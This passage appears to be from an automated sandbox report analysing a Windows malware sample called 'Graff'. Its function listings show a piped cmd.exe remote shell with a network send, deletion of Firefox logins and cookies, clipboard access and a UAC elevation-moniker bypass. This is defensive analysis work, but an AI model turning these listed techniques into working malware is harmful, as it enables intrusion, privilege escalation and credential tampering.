Opcode ID: eaae11db68c6279bdd3b65437af3777674919f502818d68cad12962a93bb39cf
Instruction ID: 4c4a6e7b08c4b55503cc16d8a70419bffaa82da7c6123ce247df7a956177c95d
Opcode Fuzzy Hash: eaae11db68c6279bdd3b65437af3777674919f502818d68cad12962a93bb39cf
Instruction Fuzzy Hash: 63E0862131424806C618BB7D985297DA759FBD6355F40953EF14EC31B7CF34C5855353

Function 01477570 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 0147757B

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: a3d820e4ca776d6e510366429ff958573d696bfa41caccdb6d519c4a7f7c3499
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 34E08C30A15248EBDB20CBB88C08AEA73A8D709322F404A5AE906C3691D5308A419E14

Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 00404277

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB

Function 01477540 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 0147754B

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: de2b623b658588effc5f71d0d47ed5dd794c84994ab94cb20fa6f53ab69f0b03
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 32D0A73090520CEBCB10CFBCDC0C9DA73A8D705321F004755FD19C3380D53199409750

Function 00871CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00871CBC

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 910132c5220054918f62466b4bbab4c5b4d9456f418b7dd7ec05a6a0112a9401
Instruction ID: b6393fdfbc0e6da4da7dae8936ea1006afb1ea549b202f3246fb8b3e924397c3
Opcode Fuzzy Hash: 910132c5220054918f62466b4bbab4c5b4d9456f418b7dd7ec05a6a0112a9401
Instruction Fuzzy Hash: 88C0923E2AC304AFF3188B80BC4AF1077A4B349F00F448001F609A96E3D3A22860FA50

Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00402636

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705

Function 01478CE0 Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 01478D66

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b65c32db1b7e8f5e49edc067bed16e5cbf71cdda227e80986200f90802b944bd
Instruction ID: 67e6fd3630e6d5cf973a840c899a7d73427dad343edf4e8da72224cf10589f28
Opcode Fuzzy Hash: b65c32db1b7e8f5e49edc067bed16e5cbf71cdda227e80986200f90802b944bd
Instruction Fuzzy Hash: FF81F674A0010AEFDB58DF98C994FEEB7B5BF88314F208559E505AB391C734AA41CB90

Function 01478F30 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 01478F41

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e00dc0563bc8137a78fec2c65d81754b1fc060abc990f532e81b711cde5d25b0
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: B5E0BF7494410E9FDB00EFA4D6496AE7BB4EF04301F100561FD05A2281D63099508A62

Function 00410ABE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16

Non-executed Functions

Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
GetProcAddress.KERNEL32(00000000), ref: 0041BD01
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
GetProcAddress.KERNEL32(00000000), ref: 0041BD30
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
GetProcAddress.KERNEL32(00000000), ref: 0041BD44
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
GetProcAddress.KERNEL32(00000000), ref: 0041BD58
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
GetProcAddress.KERNEL32(00000000), ref: 0041BD68
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
GetProcAddress.KERNEL32(00000000), ref: 0041BD78
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
GetProcAddress.KERNEL32(00000000), ref: 0041BD88
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
GetProcAddress.KERNEL32(00000000), ref: 0041BE09
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
GetProcAddress.KERNEL32(00000000), ref: 0041BE19
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
GetProcAddress.KERNEL32(00000000), ref: 0041BE53
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
GetProcAddress.KERNEL32(00000000), ref: 0041BE63

Strings

NtResumeProcess, xrefs: 0041BE30
EnumDisplayDevicesW, xrefs: 0041BDAE
SetProcessDpiAwareness, xrefs: 0041BD22, 0041BD27, 0041BD3B
IsWow64Process, xrefs: 0041BD6A
Kernel32, xrefs: 0041BD13
GetMonitorInfoW, xrefs: 0041BDD6
Iphlpapi, xrefs: 0041BE45, 0041BE4F, 0041BE5A
GetExtendedTcpTable, xrefs: 0041BE40
user32, xrefs: 0041BD3C, 0041BDB3, 0041BDC7, 0041BDDB
Shell32, xrefs: 0041BD8F
GetExtendedUdpTable, xrefs: 0041BE55
GlobalMemoryStatusEx, xrefs: 0041BD5A
EnumDisplayMonitors, xrefs: 0041BDC2
NtSuspendProcess, xrefs: 0041BE1B
shcore, xrefs: 0041BD28
NtUnmapViewOfSection, xrefs: 0041BD4B
Shlwapi, xrefs: 0041BDFC
ntdll, xrefs: 0041BD50, 0041BE20, 0041BE2A, 0041BE3A
GetConsoleWindow, xrefs: 0041BE0B
GetSystemTimes, xrefs: 0041BDEA
IsUserAnAdmin, xrefs: 0041BD8A
GetProcessImageFileNameW, xrefs: 0041BCED, 0041BCF2, 0041BD12
GetComputerNameExW, xrefs: 0041BD7A
Psapi, xrefs: 0041BCF3
kernel32, xrefs: 0041BD5F, 0041BD64, 0041BD6F, 0041BD7F, 0041BDA3, 0041BDEF, 0041BE10
SetProcessDEPPolicy, xrefs: 0041BD9E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 384173800-625181639
Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040508E

Part of subcall function 004334CF: RtlEnterCriticalSection.NTDLL(00470D18), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 0043350C

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

__Init_thread_footer.LIBCMT ref: 004050CB
CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7

Part of subcall function 00433519: RtlEnterCriticalSection.NTDLL(00470D18), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 00433561

Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
TerminateProcess.KERNEL32(00000000), ref: 004053C1
CloseHandle.KERNEL32 ref: 004053CD
CloseHandle.KERNEL32 ref: 004053D5
CloseHandle.KERNEL32 ref: 004053E7
CloseHandle.KERNEL32 ref: 004053EF

Strings

SystemDrive, xrefs: 00405109
P\G, xrefs: 00405202
P\G, xrefs: 004053D7
P\G, xrefs: 004052FE
cmd.exe, xrefs: 004050F5
P\G, xrefs: 00405332
P\G, xrefs: 00405078

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
API String ID: 3815868655-81343324
Opcode ID: 5943ff89d62816a57e12e9fc3df5565458c5d609d1a8f93027cb1190e89e5fcb
Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
Opcode Fuzzy Hash: 5943ff89d62816a57e12e9fc3df5565458c5d609d1a8f93027cb1190e89e5fcb
Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D

Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
FindClose.KERNEL32(00000000), ref: 0040B3CE
FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
FindClose.KERNEL32(00000000), ref: 0040B517

Strings

[Firefox StoredLogins not found], xrefs: 0040B3D9
UserProfile, xrefs: 0040B365
[Firefox StoredLogins Cleared!], xrefs: 0040B504
\key3.db, xrefs: 0040B47B
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B357
\logins.json, xrefs: 0040B439

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 164568a5724b5b774c795dd0ad6e985bbed4c1f6ffd2ca0289d79e2633e030b0
Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
Opcode Fuzzy Hash: 164568a5724b5b774c795dd0ad6e985bbed4c1f6ffd2ca0289d79e2633e030b0
Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D

Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0041CAE9
GetCursorPos.USER32(?), ref: 0041CAF8
SetForegroundWindow.USER32(?), ref: 0041CB01
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0041CB6C
ExitProcess.KERNEL32 ref: 0041CB74
CreatePopupMenu.USER32 ref: 0041CB7A
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F

Strings

Close, xrefs: 0041CB80

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID: Close
API String ID: 1665278180-3535843008
Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18

Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
FindClose.KERNEL32(00000000), ref: 0040B5CC
FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
FindClose.KERNEL32(00000000), ref: 0040B6B2
FindClose.KERNEL32(00000000), ref: 0040B6D1

Strings

UserProfile, xrefs: 0040B563
\cookies.sqlite, xrefs: 0040B62F
[Firefox cookies found, cleared!], xrefs: 0040B6E0
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040B555
[Firefox Cookies not found], xrefs: 0040B5D7, 0040B69F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: e8b63715e28deaf00f3edc3765bee8cff7ed130cb06ec77a8ef64a1d641ad1e8
Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
Opcode Fuzzy Hash: e8b63715e28deaf00f3edc3765bee8cff7ed130cb06ec77a8ef64a1d641ad1e8
Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E

Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004159C7
EmptyClipboard.USER32 ref: 004159D5
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
GlobalLock.KERNEL32(00000000), ref: 004159FE
GlobalUnlock.KERNEL32(00000000), ref: 00415A34
SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 780ff073229bdb68cde3977da9a11c8699c2e5aec63fd124d7dbd8a0b955b58f
Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
Opcode Fuzzy Hash: 780ff073229bdb68cde3977da9a11c8699c2e5aec63fd124d7dbd8a0b955b58f
Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

6, xrefs: 00418935
5, xrefs: 0041892B
4, xrefs: 004188DA
2, xrefs: 00418816
3, xrefs: 00418876
1, xrefs: 004187B6
7, xrefs: 0041894C
0, xrefs: 0041877D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 06234164a7a6f5fbf288e611217074a838954051a58630ad4aebb2d31f479912
Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
Opcode Fuzzy Hash: 06234164a7a6f5fbf288e611217074a838954051a58630ad4aebb2d31f479912
Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797

Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00406788
CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

Strings

[+] CoGetObject, xrefs: 004067C8
[+] CoGetObject SUCCESS, xrefs: 004067F8
[+] ucmAllocateElevatedObject, xrefs: 0040676F
[-] CoGetObject FAILURE, xrefs: 004067F1, 00406800
$, xrefs: 004067A2
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0040677D, 00406782, 004067C1
Elevation:Administrator!new:, xrefs: 004067A9

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D

Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
GetLastError.KERNEL32 ref: 00419935
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

